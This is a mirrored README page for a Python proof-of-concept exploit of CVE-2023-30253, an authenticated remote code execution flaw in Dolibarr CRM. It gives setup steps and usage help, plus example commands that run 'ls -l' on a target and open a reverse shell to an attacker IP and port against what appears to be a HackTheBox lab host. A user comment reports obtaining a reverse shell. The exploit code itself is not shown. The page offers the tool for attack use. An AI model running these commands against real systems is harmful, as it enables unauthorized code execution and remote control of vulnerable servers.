Giter Club home page Giter Club logo

cve-2023-30253's Introduction

CVE-2023-30253

image

Description

Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.

Documentation

Setup

git clone https://github.com/Rubikcuv5/cve-2023-30253.git

pip3 install -r requirements.txt

python3 CVE-2023-30253.py -h

USAGE

usage: CVE-2023-30253.py [-h] [--url URL] [-u USER] [-p PASSWORD] (-c COMMAND | -r ip port)

Argument parser

options:
  -h, --help            show this help message and exit
  --url URL             URL of the website
  -u USER, --user USER  Username
  -p PASSWORD, --password PASSWORD
                        Password
  -c COMMAND, --command COMMAND
                        Command to execute
  -r ip port, --reverseshell ip port
                        Reverse shell IP and port

EXAMPLES POC

Execute a command

python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "ls -l"

image

Getting a reverse shell

 python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -r  10.10.14.17  4444

image

Author

cve-2023-30253's People

Contributors

rubikcuv5 avatar

Stargazers

fyezool avatar George Stavroulakis avatar Pratyaksha Beri avatar Yeo Wen Qin, Kaynn avatar D4rkFlin7ra avatar Chocolate avatar avatar

Watchers

avatar

cve-2023-30253's Issues

isometric1

BoardlightproblemExploit

According to me there is a problem with the font.

I removed the line after the main having isometric1:
print(f"{Fore.CYAN}{pyfiglet.figlet_format('CVE', font='isometric1')}{Style.RESET_ALL}")

After that I could get my reverse shell :) !

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.